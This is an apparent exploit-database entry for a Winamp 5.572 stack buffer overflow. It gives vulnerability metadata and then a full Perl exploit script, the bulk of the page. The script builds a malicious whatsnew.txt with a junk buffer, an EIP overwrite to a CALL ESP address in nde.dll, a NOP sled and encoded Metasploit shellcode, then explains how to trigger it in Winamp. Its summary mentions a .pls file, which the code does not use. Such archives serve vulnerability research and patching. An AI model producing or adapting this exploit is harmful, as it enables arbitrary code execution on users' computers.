header-logo
Suggest Exploit
vendor:
Winamp
by:
NeoCortex (ICQ 158005940)
9,3
CVSS
HIGH
Stack Buffer Overflow
120
CWE
Product Name: Winamp
Affected Version From: Winamp 5.572
Affected Version To: Winamp 5.572
Patch Exists: YES
Related CWE: CVE-2009-1350
CPE: a:nullsoft:winamp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Winamp 5.572 stack buffer overflow

Winamp 5.572 is vulnerable to a stack buffer overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted .pls file to the user. This will cause the application to crash and potentially allow the attacker to execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of Winamp 5.572 or later.
Source

Exploit-DB raw data:

# Tested on: WinXP SP3 De

#!/usr/bin/perl

# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow    #\n";
print "# PoC by: Debug (eldadru\@gmail.com)     #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";

print "                        __        __________________\n";
print "             ________  /  \\      / / ____  / ____  / ________\n";
print "  ________  /_______/ / /\\ \\    / / /___/ / /   / / /_______/ ________ \n";
print " /_______/ _______   / /  \\ \\  / / /_____/ /   / / ________  /_______/\n";
print "          /_______/ / /    \\ \\/ / /_____/ /___/ / /_______/\n";
print "                   /_/      \\__/_______/_______/\n";
print "                   Where's the next phone box to the matrix please?\n\n\n";



my $version = "Winamp 5.572";

my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD	FFD4	CALL ESP nde.dll
my $nop = "\x90" x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";

open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;

print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";

Navigation

Suggest Exploit

Services By CQR